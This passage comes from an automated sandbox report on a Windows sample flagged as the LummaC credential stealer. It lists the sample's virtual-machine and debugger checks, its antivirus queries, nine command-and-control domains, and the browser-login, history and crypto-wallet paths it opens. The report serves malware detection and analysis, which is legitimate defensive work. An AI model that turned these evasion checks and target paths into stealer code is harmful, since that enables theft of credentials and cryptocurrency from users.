                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeLast function: Thread delayed
                Source: Amcache.hve.6.drBinary or memory string: VMware
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: fnCae9FQhg.exe, 00000001.00000003.2308806104.000000000099A000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2306837903.000000000099A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nj
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.00000000008D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283151520.000000000580D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: fnCae9FQhg.exe, 00000001.00000003.2283877894.0000000000992000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: fnCae9FQhg.exe, 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: SICE
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EC8B1 LdrInitializeThunk,1_2_009EC8B1

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: fnCae9FQhg.exeString found in binary or memory: bashfulacid.lat
                Source: fnCae9FQhg.exeString found in binary or memory: curverpluch.lat
                Source: fnCae9FQhg.exeString found in binary or memory: tentabatte.lat
                Source: fnCae9FQhg.exeString found in binary or memory: shapestickyr.lat
                Source: fnCae9FQhg.exeString found in binary or memory: talkynicer.lat
                Source: fnCae9FQhg.exeString found in binary or memory: slipperyloo.lat
                Source: fnCae9FQhg.exeString found in binary or memory: manyrestro.lat
                Source: fnCae9FQhg.exeString found in binary or memory: observerfry.lat
                Source: fnCae9FQhg.exeString found in binary or memory: wordyfindy.lat
                Source: fnCae9FQhg.exe, fnCae9FQhg.exe, 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 0=Program Manager
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: fnCae9FQhg.exe, 00000001.00000003.2365046031.000000000098B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: es%\Windows Defender\MsMpeng.exe
                Source: fnCae9FQhg.exe, 00000001.00000003.2365046031.000000000099E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
                Source: fnCae9FQhg.exe, 00000001.00000003.2414518158.000000000098B000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364429054.000000000098B000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2377455561.000000000098B000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364429054.000000000099E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2365046031.000000000098B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: fnCae9FQhg.exe PID: 404, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: fnCae9FQhg.exe, 00000001.00000003.2364429054.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\walletsk
                Source: fnCae9FQhg.exe, 00000001.00000003.2340551738.000000000098B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: fnCae9FQhg.exe, 00000001.00000003.2340646207.0000000000975000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: fnCae9FQhg.exe, 00000001.00000003.2307855393.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3OL
                Source: fnCae9FQhg.exe, 00000001.00000003.2340717986.0000000000969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: fnCae9FQhg.exe, 00000001.00000003.2340717986.0000000000969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
